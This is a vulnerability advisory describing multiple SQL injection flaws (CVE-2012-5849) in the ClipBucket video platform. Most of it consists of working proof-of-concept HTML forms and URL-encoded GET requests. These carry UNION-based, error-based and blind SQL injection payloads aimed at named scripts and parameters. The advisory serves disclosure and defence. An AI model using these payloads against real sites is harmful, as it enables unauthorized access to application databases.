Multiple SQL Injection vulnerabilities in ClipBucket

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in ClipBucket, which can be exploited to perform SQL Injection attacks.

1. Multiple SQL Injections in ClipBucket: CVE-2012-5849
   1.1 The vulnerability exists due to improper sanitation of input in multiple parameters within the “/ajax.php” script. A remote attacker can send a specially crafted HTTP POST request and execute arbitrary SQL queries in application’s database. The following parameter are vulnerable to SQL injection attacks:
   - “uid” (when “mode” is set to “add_friend”). This vulnerability require that attacker is logged-in into the application, however new user registration is open by default ;
   - “id” (when “mode” is set to “share_object” or “add_to_fav”, and “type” is set to “video”, “photo”, or “collection”);
   - “id” (when “mode” is set to “rating” and “type” is set to “video”, “photo”, “collection”, or “user”). This vulnerabilities require that attacker is logged-in into the application, however new user registration is open by default;
   - “id” (when “mode” is set to “flag_object” and “type” is set to “video”, “group”, “user”, “photo”, or “collection”);
   - “cid” (when “mode” is set to “add_new_item” or “remove_collection_item” and “type” is set to “video” or “photo”);
   - “cid” (when “mode” is set to “remove_collection_item” and “type” is set to “videos” or “photos”);
   - “cid” (when “mode” is set to “get_item” or “load_more_items” and “type” is set to “videos” or “photos”);
   - “ci_id” (when “mode” is set to “get_item” and “type” is set to “videos” or “photos”).
   The following PoC (Proof-of-Concept) codes demonstrate the vulnerabilities.
   PoC 1:
   <form action=“http://[host]/ajax.php” method=“post”>
   <input type=“hidden” name=“mode” value=“add_friend” />
   <input type=“hidden” name=“uid” value=“’ UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3 ,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10 – " />
   <input type=“submit” id=“btn”>
   </form>
   PoC 2:
   <form action=“http://[host]/ajax.php” method=“post”>
   <input type=“hidden” name=“mode” value=“get_item” />
   <input type=“hidden” name=“type” value=”[videos|photos]" />
   <input type=“hidden” name=“cid” value=“0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3 ,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 – " />
   <input type=“hidden” name=“ci_id” value=”" />
   <input type=“submit” id=“btn”>
   </form>
   PoC 3:
   <form action=“http://[host]/ajax.php” method=“post”>
   <input type=“hidden” name=“mode” value=“get_item” />
   <input type=“hidden” name=“type” value=“[videos|photos]” />
   <input type=“hidden” name=“cid” value=“” />
   <input type=“hidden” name=“ci_id” value=“0 UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3 ,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 – " />
   <input type=“submit” id=“btn”>
   </form>
   PoC 4:
   <form action=“http://[host]/ajax.php” method=“post”>
   <input type=“hidden” name=“mode” value=“load_more_items” />
   <input type=“hidden” name=“type” value=”[videos|photos]" />
   <input type=“hidden” name=“cid” value=“0’ UNION SELECT 1,2,3,4,5,6,7,version(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3 ,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 – " />
   <input type=“submit” id=“btn”>
   </form>
   The second type of PoC code uses error-based SQL injection technique to display SQL server version:
   <form action=“http://[host]/ajax.php” method=“post”>
   <input type=“hidden” name=“mode” value=“rating” />
   <input type=“hidden” name=“type” value=”[video|photo|collection|user]" />
   <input type=“hidden” name=“rating” value=“1” />
   <input type=“hidden” name=“id” value="-1 OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) – " />
   <input type=“submit” id=“btn”>
   </form>
   The third PoC code demonstrates vulnerability exploitation by blind SQL injection technique:
   <form action=“http://[host]/ajax.php” method=“post”>
   <input type=“hidden” name=“mode” value=“share_object” />
   <input type=“hidden” name=“type” value=“video” />
   <input type=“hidden” name=“id” value="0 OR version()>=‘5’ – " />
   <input type=“submit” id=“btn”>
   </form>
   If application uses MySQL server version 5 or greater, the result of the above-mentioned HTTP request will be a message saying: “You are not logged in” or “Please enter usernames or emails to send this video”.

1.2 The vulnerability was discovered in the “/user_contacts.php” script while handling the “user” HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
The following PoC demonstrates the vulnerability:
http://[host]/user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%2 8%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8, 9,10,1,2,3,4,5,6,7,8,9,10%20–%202

1.3 The vulnerability was discovered in the “/view_channel.php” script while handling the “user” HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28 %29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9 ,10,1,2,3,4,5,6,7,8,9,10%20–%202

1.4 The vulnerability exists due to an error in the “view_page.php” script while handling the “pid” HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_page.php?pid=0%27%20UNION%20SELECT%201,2,3,4,5,version%28 %29,7,8,9,10%20–%202

1.5 The vulnerability was discovered in the “view_topic.php” script while handling the “tid” HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.
The following PoC demonstrates the vulnerability:
http://[host]/view_topic.php?tid=0%27%20UNION%20SELECT%201,version%28%29,3,4 ,5,6,7,8,9,10,11,12%20–%202

1.6 The vulnerability was discovered in the “/watch_video.php” script while handling the “v” HTTP GET parameter. A remote attacker can inject and execute arbitrary SQL commands in application’s database.

Notice: some of the above-mentioned vulnerabilities were described in Secunia Advisory https://secunia.com/advisories/47474/ for the previous versions of ClipBucket, however they were not fixed in the tested version.